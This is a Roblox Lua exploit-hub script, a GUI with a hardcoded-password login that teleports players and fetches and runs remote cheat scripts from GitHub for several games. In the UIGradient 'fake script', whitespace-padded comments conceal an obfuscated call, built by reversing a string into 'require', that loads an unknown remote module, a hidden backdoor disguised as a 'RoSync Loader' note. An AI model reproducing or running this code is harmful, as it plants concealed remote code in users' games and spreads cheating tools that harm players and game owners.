-- Gui to Lua
-- Version: 3.2

-- Instances:

local GUILogin = Instance.new("ScreenGui")
local login = Instance.new("ImageLabel")
local enterkey = Instance.new("ImageLabel")
local UIGradient = Instance.new("UIGradient")
local enterkey_2 = Instance.new("TextButton")
local UIGradient_2 = Instance.new("UIGradient")
local Pass = Instance.new("ImageLabel")
local password = Instance.new("TextBox")
local UIGradient_3 = Instance.new("UIGradient")
local howtogetkey = Instance.new("ImageLabel")
local howtogetkey_2 = Instance.new("TextButton")
local main = Instance.new("ImageLabel")
local UIGradient_4 = Instance.new("UIGradient")
local Roundify = Instance.new("ImageLabel")
local black = Instance.new("ImageLabel")
local click = Instance.new("ImageLabel")
local clicktoopengui = Instance.new("TextButton")

--Properties:

GUILogin.Name = "GUI Login"
GUILogin.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")

login.Name = "login"
login.Parent = GUILogin
login.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
login.BackgroundTransparency = 1.000
login.LayoutOrder = 3
login.Position = UDim2.new(0.429364562, 0, 0.254854321, 0)
login.Size = UDim2.new(0, 395, 0, 366)
login.Image = "rbxassetid://3570695787"
login.ImageColor3 = Color3.fromRGB(255, 19, 109)
login.ScaleType = Enum.ScaleType.Slice
login.SliceCenter = Rect.new(100, 100, 100, 100)
login.SliceScale = 0.120

enterkey.Name = "enterkey"
enterkey.Parent = login
enterkey.AnchorPoint = Vector2.new(0.5, 0.5)
enterkey.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
enterkey.BackgroundTransparency = 1.000
enterkey.Position = UDim2.new(0.499396414, 0, 0.497599274, 0)
enterkey.Size = UDim2.new(0.53032136, 24, 0.109289698, 24)
enterkey.Image = "rbxassetid://3570695787"
enterkey.ScaleType = Enum.ScaleType.Slice
enterkey.SliceCenter = Rect.new(100, 100, 100, 100)
enterkey.SliceScale = 0.120

UIGradient.Parent = enterkey

enterkey_2.Name = "enterkey"
enterkey_2.Parent = enterkey
enterkey_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
enterkey_2.BackgroundTransparency = 1.000
enterkey_2.BorderSizePixel = 0
enterkey_2.Position = UDim2.new(-0.00173170865, 0, -0.0117071867, 0)
enterkey_2.Size = UDim2.new(0, 233, 0, 64)
enterkey_2.Font = Enum.Font.FredokaOne
enterkey_2.Text = "Enter Key"
enterkey_2.TextColor3 = Color3.fromRGB(0, 0, 0)
enterkey_2.TextScaled = true
enterkey_2.TextSize = 14.000
enterkey_2.TextWrapped = true

UIGradient_2.Parent = login

Pass.Name = "Pass"
Pass.Parent = login
Pass.AnchorPoint = Vector2.new(0.5, 0.5)
Pass.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Pass.BackgroundTransparency = 1.000
Pass.Position = UDim2.new(0.5, 0, 0.18306011, 0)
Pass.Size = UDim2.new(0.873417795, 24, 0.213114798, 24)
Pass.Image = "rbxassetid://3570695787"
Pass.ImageColor3 = Color3.fromRGB(255, 16, 160)
Pass.ScaleType = Enum.ScaleType.Slice
Pass.SliceCenter = Rect.new(100, 100, 100, 100)
Pass.SliceScale = 0.120

password.Name = "password"
password.Parent = Pass
password.BackgroundColor3 = Color3.fromRGB(255, 16, 160)
password.BackgroundTransparency = 1.000
password.BorderColor3 = Color3.fromRGB(37, 203, 184)
password.BorderSizePixel = 0
password.Size = UDim2.new(0, 369, 0, 102)
password.Font = Enum.Font.FredokaOne
password.PlaceholderText = "Pass"
password.Text = ""
password.TextColor3 = Color3.fromRGB(255, 255, 255)
password.TextSize = 80.000
password.TextStrokeTransparency = 3.000
password.TextWrapped = true

UIGradient_3.Parent = Pass

howtogetkey.Name = "howtogetkey"
howtogetkey.Parent = login
howtogetkey.AnchorPoint = Vector2.new(0.5, 0.5)
howtogetkey.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
howtogetkey.BackgroundTransparency = 1.000
howtogetkey.Position = UDim2.new(0.498280972, 0, 0.784484506, 0)
howtogetkey.Size = UDim2.new(0.528090298, 24, 0.109289698, 24)
howtogetkey.Image = "rbxassetid://3570695787"
howtogetkey.ScaleType = Enum.ScaleType.Slice
howtogetkey.SliceCenter = Rect.new(100, 100, 100, 100)
howtogetkey.SliceScale = 0.120

howtogetkey_2.Name = "howtogetkey"
howtogetkey_2.Parent = howtogetkey
howtogetkey_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
howtogetkey_2.BackgroundTransparency = 1.000
howtogetkey_2.BorderSizePixel = 0
howtogetkey_2.Size = UDim2.new(0, 232, 0, 63)
howtogetkey_2.Font = Enum.Font.FredokaOne
howtogetkey_2.Text = "How To Gey Key"
howtogetkey_2.TextColor3 = Color3.fromRGB(0, 0, 0)
howtogetkey_2.TextScaled = true
howtogetkey_2.TextSize = 14.000
howtogetkey_2.TextWrapped = true
howtogetkey_2.MouseButton1Click:Connect(function()
	local CoreGui = game:GetService("StarterGui")

	CoreGui:SetCore("SendNotification", {
		Title = "How to get Key";
		Text = "Join Discord Server";
		Duration = 5;
		Icon = "rbxassetid://6394116489";
		Button1 = "Copy Link Discord",setclipboard("https://discord.gg/4KqkXRDdGE");
	})
end)

main.Name = "main"
main.Parent = GUILogin
main.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
main.BackgroundTransparency = 1.000
main.LayoutOrder = 3
main.Position = UDim2.new(0.429364562, 0, 0.254854321, 0)
main.Size = UDim2.new(0, 395, 0, 366)
main.Image = "rbxassetid://3570695787"
main.ImageColor3 = Color3.fromRGB(255, 19, 109)
main.ScaleType = Enum.ScaleType.Slice
main.SliceCenter = Rect.new(100, 100, 100, 100)
main.SliceScale = 0.120

UIGradient_4.Parent = main

Roundify.Name = "Roundify"
Roundify.Parent = main
Roundify.AnchorPoint = Vector2.new(0.5, 0.5)
Roundify.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Roundify.BackgroundTransparency = 1.000
Roundify.Position = UDim2.new(0.498462349, 0, 0.453594595, 0)
Roundify.Size = UDim2.new(0.567088604, 24, 0.251451492, 24)
Roundify.Image = "rbxassetid://3570695787"
Roundify.ImageColor3 = Color3.fromRGB(225, 216, 216)
Roundify.ScaleType = Enum.ScaleType.Slice
Roundify.SliceCenter = Rect.new(100, 100, 100, 100)
Roundify.SliceScale = 0.120

black.Name = "black"
black.Parent = main
black.AnchorPoint = Vector2.new(0.5, 0.5)
black.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
black.BackgroundTransparency = 1.000
black.Position = UDim2.new(0.498734176, 0, 0.498633891, 0)
black.Size = UDim2.new(0.906329095, 24, 0.898907125, 24)
black.Image = "rbxassetid://3570695787"
black.ImageColor3 = Color3.fromRGB(243, 108, 255)
black.ScaleType = Enum.ScaleType.Slice
black.SliceCenter = Rect.new(100, 100, 100, 100)
black.SliceScale = 0.120

click.Name = "click"
click.Parent = main
click.AnchorPoint = Vector2.new(0.5, 0.5)
click.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
click.BackgroundTransparency = 1.000
click.Position = UDim2.new(0.498462379, 0, 0.452228487, 0)
click.Size = UDim2.new(0.536708951, 24, 0.226861343, 24)
click.Image = "rbxassetid://3570695787"
click.ScaleType = Enum.ScaleType.Slice
click.SliceCenter = Rect.new(100, 100, 100, 100)
click.SliceScale = 0.120

clicktoopengui.Name = "clicktoopengui"
clicktoopengui.Parent = click
clicktoopengui.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
clicktoopengui.BackgroundTransparency = 1.000
clicktoopengui.BorderSizePixel = 0
clicktoopengui.Position = UDim2.new(0.00690886844, 0, -0.0373722613, 0)
clicktoopengui.Size = UDim2.new(0, 233, 0, 113)
clicktoopengui.Font = Enum.Font.FredokaOne
clicktoopengui.Text = "Click To Open Gui"
clicktoopengui.TextColor3 = Color3.fromRGB(0, 0, 0)
clicktoopengui.TextScaled = true
clicktoopengui.TextSize = 14.000
clicktoopengui.TextWrapped = true
clicktoopengui.MouseButton1Click:Connect(function()
	login.Visible = false	
	main.Visible = false
	wait()
	local library = loadstring(game:HttpGet("https://raw.githubusercontent.com/GreenDeno/Venyx-UI-Library/main/source.lua"))()
	local venyx = library.new("Select NBT Hub", 5013109572)
	local themes = {
		Background = Color3.fromRGB(24, 24, 24),
		Glow = Color3.fromRGB(0, 0, 0),
		Accent = Color3.fromRGB(10, 10, 10),
		LightContrast = Color3.fromRGB(20, 20, 20),
		DarkContrast = Color3.fromRGB(14, 14, 14),  
		TextColor = Color3.fromRGB(255, 255, 255)
	}
	local page2 = venyx:addPage("Tp To Game", 6023426915)
	local page4 = venyx:addPage("Game Support", 6022668888)
	local page3 = venyx:addPage("Credit", 6022668888)

	local tab2 = page2:addSection("Teleport To Game Support")
	tab2:addButton("Wizard Tycoon - 2 Playe", function()
		game:GetService('TeleportService'):Teleport(281489669)
		wait()
		game.CoreGui["Select NBT Hub"]:Destroy()
	end)

	tab2:addButton("Ben 10: Ultimate Ensemble", function()
		game:GetService('TeleportService'):Teleport(6115869347)
		wait()
		game.CoreGui["Select NBT Hub"]:Destroy()
	end)

	tab2:addButton("Bubble Gum Simulator", function()
		game:GetService('TeleportService'):Teleport(2512643572)
		wait()
		game.CoreGui["Select NBT Hub"]:Destroy()
	end)

	tab2:addButton("Build A Boat For Treasure", function()
		game:GetService('TeleportService'):Teleport(537413528)
		wait()
		game.CoreGui["Select NBT Hub"]:Destroy()
	end)

	tab2:addButton("Three Piece", function()
		game:GetService('TeleportService'):Teleport(6326691606)
		wait()
		game.CoreGui["Select NBT Hub"]:Destroy()
	end)

	tab2:addButton("HEROES ONLINE", function()
		game:GetService('TeleportService'):Teleport(1992612043)
		wait()
		game.CoreGui["Select NBT Hub"]:Destroy()
	end)

	tab2:addButton("One Piece Millennium 3", function()
		game:GetService('TeleportService'):Teleport(5835263912)
		wait()
		game.CoreGui["Select NBT Hub"]:Destroy()
	end)

	tab2:addButton("Speed Run Simulator", function()
		game:GetService('TeleportService'):Teleport(5293755937)
		wait()
		game.CoreGui["Select NBT Hub"]:Destroy()
	end)

	local tab4 = page4:addSection("List - Click To Open Gui")
	tab4:addButton("Wizard Tycoon - 2 Playe", function()
		game.CoreGui["Select NBT Hub"]:Destroy()
		wait()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/NiceBBMBThai12/NBTScript/main/Wizard%20Tycoon%20-%202%20Player"))()
	end)

	tab4:addButton("Ben 10: Ultimate Ensemble", function()
		game.CoreGui["Select NBT Hub"]:Destroy()
		wait()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/NiceBBMBThai12/NBTScript/main/Ben%2010%3A%20Ultimate%20Ensemble"))()
	end)

	tab4:addButton("Bubble Gum Simulator", function()
		game.CoreGui["Select NBT Hub"]:Destroy()
		wait()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/NiceBBMBThai12/NBTScript/main/Bubble%20Gum%20Simulator%20OP"))()
	end)

	tab4:addButton("Build A Boat For Treasure", function()
		game.CoreGui["Select NBT Hub"]:Destroy()
		wait()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/NiceBBMBThai12/NBTScript/main/Build%20A%20Boat%20For%20Treasure%20OP"))()
	end)

	tab4:addButton("Three Piece", function()
		game.CoreGui["Select NBT Hub"]:Destroy()
		wait()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/NiceBBMBThai12/NBTScript/main/THREE%20PIECE%20OP"))()
	end)

	tab4:addButton("HEROES ONLINE", function()
		game.CoreGui["Select NBT Hub"]:Destroy()
		wait()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/NiceBBMBThai12/NBTScript/main/HEROES%20ONLINE"))()
	end)

	tab4:addButton("One Piece Millennium 3", function()
		game.CoreGui["Select NBT Hub"]:Destroy()
		wait()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/NiceBBMBThai12/NBTScript/main/One%20Piece%20Millennium%203"))()
	end)

	tab4:addButton("Speed Run Simulator", function()
		game.CoreGui["Select NBT Hub"]:Destroy()
		wait()
		loadstring(game:HttpGet("https://raw.githubusercontent.com/NiceBBMBThai12/NBTScript/main/Speed%20Sim"))()
	end)

	local tab3 = page3:addSection("Credit")
	tab3:addButton("Copy Link Discord", function()
		setclipboard("https://discord.gg/4KqkXRDdGE")
	end)

	tab3:addButton("Gui Make By. NiceBBMBThai#4439", function()
		setclipboard("NiceBBMBThai#4439")
	end)

	tab3:addButton("Destroy Gui", function()
		game.CoreGui["Select NBT Hub"]:Destroy()
	end)

end)

-- Scripts:

local function HYPFV_fake_script() -- UIGradient. 
	local script = Instance.new('Script', UIGradient)

	
	--[[ Last synced 4/21/2021 01:21                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5723263360) --[[                                                                                                  ]]--
end
coroutine.wrap(HYPFV_fake_script)()
local function RJWCTBK_fake_script() -- enterkey_2.LocalScript 
	local script = Instance.new('LocalScript', enterkey_2)

	local password = script.Parent.Parent.Parent.Pass.password
	local main = script.Parent.Parent.Parent.Parent.main    --change these if you didnt do what i did
	local login = script.Parent.Parent.Parent
	
	main.Visible = false
	
	script.Parent.MouseButton1Click:Connect(function()
		if password.Text == "c9@YH_#z5D8e3Yjb" or
			password.Text == "AdminNBT@Nice" then
			login.Visible = false
			main.Visible = true --subscribe to IamTow
		end
	end)
end
coroutine.wrap(RJWCTBK_fake_script)()
local function PIVL_fake_script() -- login.Dragify 
	local script = Instance.new('LocalScript', login)

	local UIS = game:GetService("UserInputService")
	function dragify(Frame)
	    dragToggle = nil
	    local dragSpeed = 0.50
	    dragInput = nil
	    dragStart = nil
	    local dragPos = nil
	    function updateInput(input)
	        local Delta = input.Position - dragStart
	        local Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y)
	        game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.30), {Position = Position}):Play()
	    end
	    Frame.InputBegan:Connect(function(input)
	        if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and UIS:GetFocusedTextBox() == nil then
	            dragToggle = true
	            dragStart = input.Position
	            startPos = Frame.Position
	            input.Changed:Connect(function()
	                if input.UserInputState == Enum.UserInputState.End then
	                    dragToggle = false
	                end
	            end)
	        end
	    end)
	    Frame.InputChanged:Connect(function(input)
	        if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
	            dragInput = input
	        end
	    end)
	    game:GetService("UserInputService").InputChanged:Connect(function(input)
	        if input == dragInput and dragToggle then
	            updateInput(input)
	        end
	    end)
	end
	
	dragify(script.Parent)
end
coroutine.wrap(PIVL_fake_script)()
local function DQTIZQ_fake_script() -- main.Dragify 
	local script = Instance.new('LocalScript', main)

	local UIS = game:GetService("UserInputService")
	function dragify(Frame)
	    dragToggle = nil
	    local dragSpeed = 0.50
	    dragInput = nil
	    dragStart = nil
	    local dragPos = nil
	    function updateInput(input)
	        local Delta = input.Position - dragStart
	        local Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y)
	        game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.30), {Position = Position}):Play()
	    end
	    Frame.InputBegan:Connect(function(input)
	        if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) and UIS:GetFocusedTextBox() == nil then
	            dragToggle = true
	            dragStart = input.Position
	            startPos = Frame.Position
	            input.Changed:Connect(function()
	                if input.UserInputState == Enum.UserInputState.End then
	                    dragToggle = false
	                end
	            end)
	        end
	    end)
	    Frame.InputChanged:Connect(function(input)
	        if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
	            dragInput = input
	        end
	    end)
	    game:GetService("UserInputService").InputChanged:Connect(function(input)
	        if input == dragInput and dragToggle then
	            updateInput(input)
	        end
	    end)
	end
	
	dragify(script.Parent)
end
coroutine.wrap(DQTIZQ_fake_script)()
